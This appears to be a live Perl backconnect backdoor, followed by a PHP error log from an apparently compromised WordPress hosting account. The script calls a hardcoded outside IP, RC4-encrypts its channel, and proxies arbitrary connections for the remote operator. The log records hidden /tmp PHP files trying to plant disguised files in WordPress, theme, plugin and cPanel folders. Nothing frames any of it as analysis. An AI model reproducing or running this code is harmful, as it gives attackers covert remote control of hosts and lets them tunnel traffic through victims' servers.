#!/usr/bin/perl use strict; use warnings; use Socket; use Socket qw(IPPROTO_TCP TCP_NODELAY); use Fcntl; use Fcntl qw(:flock); use threads; use threads::shared; my $host = '45.146.130.22'; my $port = 443; my $xordata = "\x00" x 50; for (my $i = 0; $i < 50; $i++) { substr($xordata, $i, 1) = pack('C', rand(255)); } sub Rc4_crypt { my $passw = shift(@_); my $length = shift(@_); my $buff0 = shift(@_); my $start = shift(@_); my $sz = shift(@_); my $rc4 = "\x00" x 256; my $pockemon0 = 0; my $pockemon1 = 0; my $pockemon2 = 0; my $pockemon3 = 0; my $pockemon4 = 0; my $pockemon5 = 0; my $pockemon6 = 0; my $pockemon7 = 0; my $pockemon8 = 0; my $rcx = $sz; my $rsi = 0; my $rbx = 0; my $gs = 0; my $t = 0; for (my $i = 0; $i <= 255; $i++) { substr($rc4, $i, 1) = pack('C', $i); } do { substr($$buff0, $start + $rsi, 1) = pack('C', (unpack('C', substr($$buff0, $start + $rsi, 1)) ^ unpack('C', substr($$passw, $rbx, 1)))); $rsi++; $rbx++; $rcx--; if ($rbx == $length) { $rbx = 0; } } while($rcx > 0); while(1) { if ($gs == 0) { $pockemon2 = 0; $pockemon3 = $length; } if ($gs != 0) { $gs = 0; $pockemon2++; if (--$pockemon3 == 0) { next; } } $pockemon7 = unpack('C', substr($rc4, $pockemon0, 1)); $t = unpack('C', substr($$passw, $pockemon2, 1)); $pockemon1 += $t; $pockemon1 = $pockemon1 & 255; $pockemon1 += $pockemon7; $pockemon1 = $pockemon1 & 255; $pockemon6 = unpack('C', substr($rc4, $pockemon1, 1)); substr($rc4, $pockemon0, 1) = pack('C', $pockemon6); substr($rc4, $pockemon1, 1) = pack('C', $pockemon7); $pockemon0++; $pockemon0 = $pockemon0 & 255; if ($pockemon0 != 0) { $gs = 1; next; } $pockemon4 = $sz; $pockemon1 = 0; $pockemon0 = 0; $pockemon2 = 0; $pockemon3 = 0; while(1) { $pockemon2++; $pockemon2 = $pockemon2 & 255; $pockemon7 = unpack('C', substr($rc4, $pockemon2, 1)); $pockemon1 += $pockemon7; $pockemon1 = $pockemon1 & 255; $pockemon8 = unpack('C', substr($rc4, $pockemon1, 1)); substr($rc4, $pockemon2, 1) = pack('C', $pockemon8); substr($rc4, $pockemon1, 1) = pack('C', $pockemon7); $pockemon8 += $pockemon7; $pockemon8 = $pockemon8 & 255; $pockemon0 = unpack('C', substr($rc4, $pockemon8, 1)); $pockemon5 = unpack('C', substr($$buff0, $start + $pockemon3, 1)); $pockemon5 = $pockemon5 ^ $pockemon0; substr($$buff0, $start + $pockemon3, 1) = pack('C', $pockemon5); $pockemon3++; if (--$pockemon4 == 0) { last; } } last; } $rsi = 0; $rcx = $sz; $rbx = 0; do { substr($$buff0, $start + $rsi, 1) = pack('C', (unpack('C', substr($$buff0, $start + $rsi, 1)) ^ unpack('C', substr($$passw, $rbx, 1)))); $rsi++; $rbx++; $rcx--; if ($rbx == $length) { $rbx = 0; } } while($rcx > 0); } sub synsend { my $cSocket = shift(@_); my $buffer = shift(@_); my $flags = shift(@_); open(my $fh, "<", '/dev/null'); flock($fh, LOCK_EX); # =============================================== send($cSocket, $buffer, $flags); # =============================================== flock($fh, LOCK_UN); close($fh); } sub newConnection { my $num = shift(@_); my $socketarray = shift(@_); my $sSocket = shift(@_); my $cSocket = shift(@_); my $buff0 = shift(@_); threads->create( sub { my $responce = pack('C', $num)."\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00"; my $domain = ''; my $port = 0; my $_ret = 0; my $data = ''; my $buffer = ''; setsockopt($cSocket, IPPROTO_TCP, TCP_NODELAY, 1); fcntl($cSocket, F_SETFL, O_NONBLOCK); if (unpack('C', substr($buff0, 7, 1)) == 3) { $domain = substr($buff0, 9, unpack('C', substr($buff0, 8, 1))); $port = unpack('S', substr($buff0, 9 + unpack('C', substr($buff0, 8, 1)) + 1, 1).substr($buff0, 9 + unpack('C', substr($buff0, 8, 1)) + 0, 1)); } elsif (unpack('C', substr($buff0, 7, 1)) == 1) { $domain = sprintf("%d.%d.%d.%d", unpack('C', substr($buff0, 8 + 0, 1)), unpack('C', substr($buff0, 8 + 1, 1)), unpack('C', substr($buff0, 8 + 2, 1)), unpack('C', substr($buff0, 8 + 3, 1))); $port = unpack('S', substr($buff0, 12 + 1, 1).substr($buff0, 12 + 0, 1)); } else { goto close_; } eval { my $paddr = sockaddr_in($port, inet_aton($domain)); connect($cSocket, $paddr); vec(my $win = '', fileno($cSocket), 1) = 1; unless (select(undef, $win, undef, 10)) { goto close_; } fcntl($cSocket, F_SETFL, 0); substr($responce, 4, 1) = "\x00"; $_ret = 1; }; close_: Rc4_crypt(\$xordata, 50, \$responce, 0, 3); Rc4_crypt(\$xordata, 50, \$responce, 3, 10); synsend($sSocket, $responce, MSG_NOSIGNAL); Rc4_crypt(\$xordata, 50, \$responce, 0, 3); if ($_ret == 1) { while ($$socketarray[$num] == 1) { vec(my $rin = '', fileno($cSocket), 1) = 1; unless (select($rin, undef, undef, 1)) { next; } $data = ''; recv($cSocket, $data, 65530, 0); unless ($data) { last; } $buffer = pack('C', $num).pack('S', length($data)).$data; Rc4_crypt(\$xordata, 50, \$buffer, 0, 3); Rc4_crypt(\$xordata, 50, \$buffer, 3, length($data)); synsend($sSocket, $buffer, MSG_NOSIGNAL); } } $$socketarray[$num] = 0; close($cSocket); substr($responce, 1, 2) = "\x00\x00"; Rc4_crypt(\$xordata, 50, \$responce, 0, 3); synsend($sSocket, substr($responce, 0, 3), MSG_NOSIGNAL); threads->detach(); }); } sub bccnct { my $host = shift(@_); my $port = shift(@_); my $remaining = 0; my $remaining4 = 0; my @socketarr; my @socketarray :shared; my $buffer = "\x00" x 100; my $buffernull = "\x00" x 3; my $buffer0 = ''; my $isExit = 0; my $ecx = 0; my $eax = 0; my $data = ''; my $_ret = 0; my $ebx = 0; my $edx = 0; socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp')); setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1); my $paddr = sockaddr_in($$port, inet_aton($$host)); unless(connect($socketarr[0], $paddr)) { goto close0; } substr($buffer, 0, 50) = $xordata; substr($buffer, 50, 2) = "\xFF\xFF"; substr($buffer, 54, 11) = "Perl script"; Rc4_crypt(\$xordata, 50, \$buffer, 50, 50); send($socketarr[0], $buffer, MSG_NOSIGNAL); while(1) { if ($remaining4 != 4) { vec(my $rin = '', fileno($socketarr[0]), 1) = 1; my $ret = select($rin, undef, undef, 60); next if ($ret < 0); if ($ret == 0) { last if (substr($buffernull, 0, 3) ne "\x00\x00\x00"); last if ($remaining != 0); last if ($remaining4 != 0); Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3); synsend($socketarr[0], $buffernull, MSG_NOSIGNAL); next; } } if ($remaining != 0 || $remaining4 == 4) { if ($edx == 0) { if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") { $isExit = 1; last; } elsif ($ebx < 200 && $ebx > 0) { $socketarray[$ebx] = 0; } } else { $ecx = $edx; $ecx = $ecx - $remaining; $data = ''; recv($socketarr[0], $data, $ecx, 0); unless ($data) { last; } $remaining += length($data); $buffer0 .= $data; if ($edx == $remaining) { Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining); if (unpack('C', substr($buffer0, 0, 1)) == 0) { socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp')); $socketarray[$ebx] = 1; newConnection($ebx, \@socketarray, $socketarr[0], $socketarr[$ebx], $buffer0); } else { send($socketarr[$ebx], substr($buffer0, 4, $remaining), MSG_NOSIGNAL); } $remaining = 0; } } $remaining4 = 0; } else { if ($remaining4 == 0) { $buffer0 = ''; } $eax = 4; $eax = $eax - $remaining4; $data = ''; recv($socketarr[0], $data, $eax, 0); unless ($data) { last; } $remaining4 += length($data); $buffer0 .= $data; $buffernull = "\x00" x 3; if ($remaining4 == 4) { Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4); $ebx = unpack('C', substr($buffer0, 1, 1)); $edx = unpack('S', substr($buffer0, 2, 2)); $_ret = 1; } } } close0: close($socketarr[0]); for (my $i = 0; $i < 200; $i++) { $socketarray[$i] = 0; } sleep 10; if ($isExit == 1) { exit; } return $_ret; } bccnct(\$host, \$port); [10-Aug-2025 06:08:15 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/images/geo_zones): Failed to open stream: No such file or directory in /tmp/.ibase_pconnection on line 1 [10-Aug-2025 06:29:47 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/b6/edit_groups): Failed to open stream: No such file or directory in /tmp/.content on line 1 [10-Aug-2025 06:32:08 UTC] PHP Warning: Undefined array key "file" in /tmp/.sys on line 1 [10-Aug-2025 06:32:08 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.sys on line 1 [10-Aug-2025 06:36:36 UTC] PHP Warning: gzdecode(): data error in /tmp/.accepted on line 1 [10-Aug-2025 06:49:12 UTC] PHP Warning: Undefined array key "file" in /tmp/.config on line 1 [10-Aug-2025 06:49:12 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.config on line 1 [10-Aug-2025 06:54:24 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/block_search): Failed to open stream: No such file or directory in /tmp/.reset on line 1 [10-Aug-2025 06:57:43 UTC] PHP Warning: Undefined array key "file" in /tmp/.accepted on line 1 [10-Aug-2025 06:57:43 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.accepted on line 1 [10-Aug-2025 06:59:42 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/d7/mod_acymailing): Failed to open stream: No such file or directory in /tmp/.rfind on line 1 [10-Aug-2025 07:02:37 UTC] PHP Warning: gzdecode(): data error in /tmp/.ibase_pconnection on line 1 [10-Aug-2025 07:03:30 UTC] PHP Warning: Undefined array key "file" in /tmp/.accept on line 1 [10-Aug-2025 07:03:30 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.accept on line 1 [10-Aug-2025 07:08:20 UTC] PHP Warning: gzdecode(): data error in /tmp/.class on line 1 [10-Aug-2025 07:11:37 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/block_search): Failed to open stream: No such file or directory in /tmp/.ob_iconv_handle on line 1 [10-Aug-2025 07:14:28 UTC] PHP Warning: Undefined array key "file" in /tmp/.accept on line 1 [10-Aug-2025 07:14:28 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.accept on line 1 [10-Aug-2025 07:16:44 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/d7/mod_acymailing): Failed to open stream: No such file or directory in /tmp/.uconvert on line 1 [10-Aug-2025 07:19:55 UTC] PHP Warning: Undefined array key "file" in /tmp/.rjust on line 1 [10-Aug-2025 07:19:55 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.rjust on line 1 [10-Aug-2025 07:24:48 UTC] PHP Warning: gzdecode(): data error in /tmp/.accept on line 1 [10-Aug-2025 07:24:51 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/Text/Diff/Engine/busi_report05): Failed to open stream: No such file or directory in /tmp/.system on line 1 [10-Aug-2025 07:32:40 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/updateclassads): Failed to open stream: No such file or directory in /tmp/.dbx_convert on line 1 [10-Aug-2025 07:34:22 UTC] PHP Warning: gzdecode(): data error in /tmp/.rfind on line 1 [10-Aug-2025 07:35:24 UTC] PHP Warning: Undefined array key "file" in /tmp/.reset on line 1 [10-Aug-2025 07:35:24 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.reset on line 1 [10-Aug-2025 07:41:17 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/Text/Diff/Engine/busi_report05): Failed to open stream: No such file or directory in /tmp/.classes on line 1 [10-Aug-2025 07:43:44 UTC] PHP Warning: Undefined array key "file" in /tmp/.rfind on line 1 [10-Aug-2025 07:43:44 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.rfind on line 1 [10-Aug-2025 07:55:13 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/mod_gallery2): Failed to open stream: No such file or directory in /tmp/.cache on line 1 [10-Aug-2025 07:57:14 UTC] PHP Warning: Undefined array key "file" in /tmp/.db2_convert on line 1 [10-Aug-2025 07:57:14 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.db2_convert on line 1 [10-Aug-2025 08:00:39 UTC] PHP Warning: gzdecode(): data error in /tmp/.reset on line 1 [10-Aug-2025 08:06:16 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/themes/astra/inc/customizer/configurations/builder/footer/configs/mod_gallery2): Failed to open stream: No such file or directory in /tmp/.multi on line 1 [10-Aug-2025 08:07:55 UTC] PHP Warning: Undefined array key "file" in /tmp/.parle_tokens on line 1 [10-Aug-2025 08:07:55 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.parle_tokens on line 1 [10-Aug-2025 08:16:59 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/logs/restoredb/mod_gallery2): Failed to open stream: No such file or directory in /tmp/.request on line 1 [10-Aug-2025 08:18:10 UTC] PHP Warning: Undefined array key "file" in /tmp/.accept on line 1 [10-Aug-2025 08:18:10 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.accept on line 1 [10-Aug-2025 08:20:32 UTC] PHP Warning: gzdecode(): data error in /tmp/.uconvert on line 1 [10-Aug-2025 08:24:32 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/logs/restoredb/mod_gallery2): Failed to open stream: No such file or directory in /tmp/.oauthexceptions on line 1 [10-Aug-2025 08:25:23 UTC] PHP Warning: Undefined array key "file" in /tmp/.parle_tokens on line 1 [10-Aug-2025 08:25:23 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.parle_tokens on line 1 [10-Aug-2025 10:49:24 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/class.report): Failed to open stream: No such file or directory in /tmp/.config on line 1 [10-Aug-2025 10:51:25 UTC] PHP Warning: Undefined array key "file" in /tmp/.db2_convert on line 1 [10-Aug-2025 10:51:25 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.db2_convert on line 1 [10-Aug-2025 10:54:23 UTC] PHP Warning: gzdecode(): data error in /tmp/.oauthexceptions on line 1 [10-Aug-2025 11:00:07 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/themes/astra/inc/builder/type/header/mobile-trigger/dynamic-css/class.report): Failed to open stream: No such file or directory in /tmp/.partition on line 1 [10-Aug-2025 11:01:44 UTC] PHP Warning: Undefined array key "file" in /tmp/.post on line 1 [10-Aug-2025 11:01:44 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.post on line 1 [10-Aug-2025 11:06:34 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/authfactory): Failed to open stream: No such file or directory in /tmp/.lock on line 1 [10-Aug-2025 12:05:46 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//var/log/alt-php54-newrelic/view_product): Failed to open stream: No such file or directory in /tmp/.mb_convert on line 1 [10-Aug-2025 12:08:12 UTC] PHP Warning: Undefined array key "file" in /tmp/.requests on line 1 [10-Aug-2025 12:08:12 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.requests on line 1 [10-Aug-2025 12:11:54 UTC] PHP Warning: gzdecode(): data error in /tmp/.mb_convert on line 1 [10-Aug-2025 12:18:41 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//var/log/alt-php54-newrelic/view_product): Failed to open stream: No such file or directory in /tmp/.system on line 1 [10-Aug-2025 12:20:46 UTC] PHP Warning: Undefined array key "file" in /tmp/.oauthexceptions on line 1 [10-Aug-2025 12:20:46 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.oauthexceptions on line 1 [10-Aug-2025 13:44:22 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/laravel/serializable-closure/searchbar): Failed to open stream: No such file or directory in /tmp/.post on line 1 [10-Aug-2025 13:47:20 UTC] PHP Warning: Undefined array key "file" in /tmp/.include on line 1 [10-Aug-2025 13:47:20 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.include on line 1 [10-Aug-2025 13:51:28 UTC] PHP Warning: gzdecode(): data error in /tmp/.internal on line 1 [10-Aug-2025 13:58:58 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/.cpanel/ea-php-cli/public_html/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/laravel/serializable-closure/searchbar): Failed to open stream: No such file or directory in /tmp/.class on line 1 [10-Aug-2025 14:01:52 UTC] PHP Warning: Undefined array key "file" in /tmp/.config on line 1 [10-Aug-2025 14:01:52 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.config on line 1 [10-Aug-2025 14:57:07 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/interactivity-api/smileform): Failed to open stream: No such file or directory in /tmp/.ibase_pconnection on line 1 [10-Aug-2025 14:59:26 UTC] PHP Warning: Undefined array key "file" in /tmp/.uconvert on line 1 [10-Aug-2025 14:59:26 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.uconvert on line 1 [10-Aug-2025 15:02:36 UTC] PHP Warning: gzdecode(): data error in /tmp/.class on line 1 [10-Aug-2025 15:07:05 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/interactivity-api/smileform): Failed to open stream: No such file or directory in /tmp/.lock on line 1 [10-Aug-2025 15:08:06 UTC] PHP Warning: Undefined array key "file" in /tmp/.multi on line 1 [10-Aug-2025 15:08:06 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.multi on line 1 [10-Aug-2025 15:14:41 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/SimplePie/library/SimplePie/Net/smileform): Failed to open stream: No such file or directory in /tmp/.rjust on line 1 [10-Aug-2025 15:15:07 UTC] PHP Warning: Undefined array key "file" in /tmp/.oauthexceptions on line 1 [10-Aug-2025 15:15:07 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.oauthexceptions on line 1 [10-Aug-2025 15:16:58 UTC] PHP Warning: gzdecode(): data error in /tmp/.dba_insertion on line 1 [10-Aug-2025 15:19:43 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/SimplePie/library/SimplePie/Net/smileform): Failed to open stream: No such file or directory in /tmp/.requests on line 1 [10-Aug-2025 15:19:58 UTC] PHP Warning: Undefined array key "file" in /tmp/.internal on line 1 [10-Aug-2025 15:19:58 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.internal on line 1 [10-Aug-2025 16:31:30 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/24/help_about): Failed to open stream: No such file or directory in /tmp/.created on line 1 [10-Aug-2025 16:35:09 UTC] PHP Warning: Undefined array key "file" in /tmp/.reset on line 1 [10-Aug-2025 16:35:09 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.reset on line 1 [10-Aug-2025 16:39:52 UTC] PHP Warning: gzdecode(): data error in /tmp/.accept on line 1 [10-Aug-2025 16:49:21 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/tmp/pma_template_compiles_baitchct/twig/24/help_about): Failed to open stream: No such file or directory in /tmp/.multi on line 1 [10-Aug-2025 16:53:03 UTC] PHP Warning: Undefined array key "file" in /tmp/.locked on line 1 [10-Aug-2025 16:53:03 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.locked on line 1 [10-Aug-2025 16:57:15 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/SimplePie/src/Decode/punbb12.inc): Failed to open stream: No such file or directory in /tmp/.center on line 1 [10-Aug-2025 16:58:15 UTC] PHP Warning: Undefined array key "file" in /tmp/.ob_iconv_handle on line 1 [10-Aug-2025 16:58:15 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.ob_iconv_handle on line 1 [10-Aug-2025 17:00:27 UTC] PHP Warning: gzdecode(): data error in /tmp/.ibase_pconnection on line 1 [10-Aug-2025 17:03:41 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/public_html/wp-includes/SimplePie/src/Decode/punbb12.inc): Failed to open stream: No such file or directory in /tmp/.parle_tokens on line 1 [10-Aug-2025 17:03:56 UTC] PHP Warning: Undefined array key "file" in /tmp/.partition on line 1 [10-Aug-2025 17:03:56 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.partition on line 1 [10-Aug-2025 17:08:22 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/mail/tmp/punbb12.inc): Failed to open stream: No such file or directory in /tmp/.request on line 1 [10-Aug-2025 17:08:29 UTC] PHP Warning: Undefined array key "file" in /tmp/.request on line 1 [10-Aug-2025 17:08:29 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.request on line 1 [10-Aug-2025 17:09:56 UTC] PHP Warning: gzdecode(): data error in /tmp/.reset on line 1 [10-Aug-2025 17:12:22 UTC] PHP Warning: file_put_contents(/home/baitchct/public_html//home/baitchct/mail/tmp/punbb12.inc): Failed to open stream: No such file or directory in /tmp/.locked on line 1 [10-Aug-2025 17:12:29 UTC] PHP Warning: Undefined array key "file" in /tmp/.locked on line 1 [10-Aug-2025 17:12:29 UTC] PHP Warning: Trying to access array offset on value of type null in /tmp/.locked on line 1